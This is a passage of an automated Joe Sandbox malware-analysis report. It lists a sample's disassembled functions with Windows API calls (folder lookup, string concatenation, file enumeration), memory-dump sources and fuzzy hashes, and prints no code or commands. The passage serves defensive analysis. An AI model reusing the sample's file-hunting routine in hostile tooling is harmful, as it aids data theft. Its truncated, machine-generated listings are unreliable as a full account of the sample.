                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: 39838efb61c86f4c32c76b85cb0a8fed6255d1301eb058c8143a013317f0b5fd
                          • Instruction ID: 4483dcc22c8425e1e88f7b778252620524517eb41bcab426b409933b410b4174
                          • Opcode Fuzzy Hash: 39838efb61c86f4c32c76b85cb0a8fed6255d1301eb058c8143a013317f0b5fd
                          • Instruction Fuzzy Hash: 61F03C35E40308BBDB20DBF8DC49FAE77B9EB58710F108258BA51EB2C0D6709A018B54
                          Function 00AFC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 00AFC74E
                            • Part of subcall function 00AFBF9F: __amsg_exit.LIBCMT ref: 00AFBFAF
                          • __getptd.LIBCMT ref: 00AFC765
                          • __amsg_exit.LIBCMT ref: 00AFC773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00AFC797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 0b878507fb40347d8a197c17a7ffe7d3d6f22b2bcef1efa63f17875ed5cc5306
                          • Instruction ID: fa560cd29bf800d0e808887e793ae29001669b3d92cffe8e91521e5027d4d1a5
                          • Opcode Fuzzy Hash: 0b878507fb40347d8a197c17a7ffe7d3d6f22b2bcef1efa63f17875ed5cc5306
                          • Instruction Fuzzy Hash: 45F0673290421C9BD720BBF99A06BBA33A06F10731F244149F605AA1E2DF645A409F66
                          Function 00AF4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4F7A
                          • lstrcat.KERNEL32(?,00B01070), ref: 00AF4F97
                          • lstrcat.KERNEL32(?,017988D8), ref: 00AF4FAB
                          • lstrcat.KERNEL32(?,00B01074), ref: 00AF4FBD
                            • Part of subcall function 00AF4910: wsprintfA.USER32 ref: 00AF492C
                            • Part of subcall function 00AF4910: FindFirstFileA.KERNEL32(?,?), ref: 00AF4943
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B00FDC), ref: 00AF4971
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B00FE0), ref: 00AF4987
                            • Part of subcall function 00AF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00AF4B7D
                            • Part of subcall function 00AF4910: FindClose.KERNEL32(000000FF), ref: 00AF4B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 70041fb3092a5acb1cb1e588381e1ec07c04420de0be3434dae29dfcb5114b10
                          • Instruction ID: bfab96c597f560ee29f7e3aa048f8ff48282405816ac37e9af283322acac2e89
                          • Opcode Fuzzy Hash: 70041fb3092a5acb1cb1e588381e1ec07c04420de0be3434dae29dfcb5114b10
                          • Instruction Fuzzy Hash: 6621987690030867CB64FBB4DD86EEE777CEB64300F004594B659D3191EEB49AC98BB2